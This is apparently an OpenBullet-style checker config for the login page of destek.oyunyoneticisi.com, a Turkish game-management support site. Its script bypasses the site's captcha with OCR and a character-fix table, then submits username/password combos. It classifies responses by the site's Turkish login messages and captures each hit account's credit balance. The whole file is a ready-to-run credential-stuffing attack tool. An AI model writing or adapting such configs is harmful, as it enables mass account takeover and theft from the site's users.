[SETTINGS]
{
  "Name": "destek",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-08-17T00:44:20.1530262-04:00",
  "AdditionalInfo": "",
  "Author": "LethalLuck",
  "Version": "1.3.7 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "https://destek.oyunyoneticisi.com/php_captcha.php",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": true,
  "Dilate": false,
  "Threshold": 0.5,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
!REQUEST GET "https://destek.oyunyoneticisi.com/giris.php" 
!  
!  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
!  HEADER "Pragma: no-cache" 
!  HEADER "Accept: */*" 

OCR "https://destek.oyunyoneticisi.com/php_captcha.php" -> VAR "OCR" eng 
  
  

FUNCTION Translate StopAfterFirstMatch=FALSE 
  KEY "P" VALUE "f" 
  KEY "G" VALUE "6" 
  KEY "o" VALUE "0" 
  KEY "r" VALUE "f" 
  "<OCR>" -> VAR "OCR" 

REQUEST POST "https://destek.oyunyoneticisi.com/index.php" 
  CONTENT "_process_login=true&email=<USER>&password=<PASS>&gkod=<OCR>&login=Log+In" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Success AND 
    KEY "Basari ile Giris Yapildi" 
  KEYCHAIN Failure OR 
    KEY "Email adresi YANLI&#350" 
    KEY "ifre HATALI" 
    KEY "Email Hatali Girildi" 
    KEY "Email Girilmedi" 
    KEY "veya Email adresi" 
  KEYCHAIN Retry OR 
    KEY "kodu HATALI" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "ancak &Uuml;yeli&#287;iniz ONAYLANMAMI&#350" 

PARSE "<SOURCE>" REGEX "color='.*'>(.*) Civar" "[1]" -> CAP "Dönüş Zamanı" 

PARSE "<SOURCE>" REGEX "Kredi : .*\">(.*) <span" "[1]" -> CAP "Kredi" 

